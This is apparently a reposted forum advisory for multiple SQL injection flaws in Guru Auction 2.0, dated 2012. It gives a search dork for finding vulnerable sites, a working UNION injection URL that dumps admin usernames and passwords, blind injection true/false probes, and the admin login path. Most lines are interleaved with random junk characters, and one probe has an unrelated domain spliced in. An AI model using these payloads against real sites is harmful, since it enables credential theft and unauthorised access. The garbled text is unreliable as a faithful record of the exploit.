Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
& b+ E- w5 g4 n: e* ~
5 {6 g+ b* A6 z1 z" M作者 : v3n0m
5 e& `1 [+ p& \6 i& Z应用 : Guru Auction 2.0; x5 Q. w& R: c$ p9 h! @% w
Price : $49 o2 P" X- i5 T/ R5 b: g
Vendor : http://www.guruscript.com/1 u$ o- }7 L/ n& z" v8 E* D1 e
Google Dork : inurl:subcat.php?cate_id=* q3 Q! A( |1 E0 x0 u3 t& J
, z( G6 F \9 u. U) v
SQLi p0c:7 Y5 H% C7 u7 S* U2 Q7 k
~~~~~~~~~~/ R# u0 v. r) e( \9 e6 f' l
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
1 u( R9 h* H# V9 ~, Z9 R8 f" v# w
# M$ x. j7 u& q0 m9 ?' u* r
6 l [1 p: Z3 \0 H" z. T盲注 p0c:: x% @) N' p* H: O
~~~~~~~~~~
& v a+ x0 X* x+ W: vhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true9 _! {3 }: I, z
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
. V: h" x/ f" s* X) s
: P( r; J1 g" a& t m管理登录入口:
2 j- d0 w! k9 j: s~~~~~~~~~~
9 r; ~# d1 ?$ V) N8 m% ~ whttp://domain.tld/[path]/admin/1 [! V( F$ m7 }
|
发表于 2012-12-31 09:24:05
收藏
支持
反对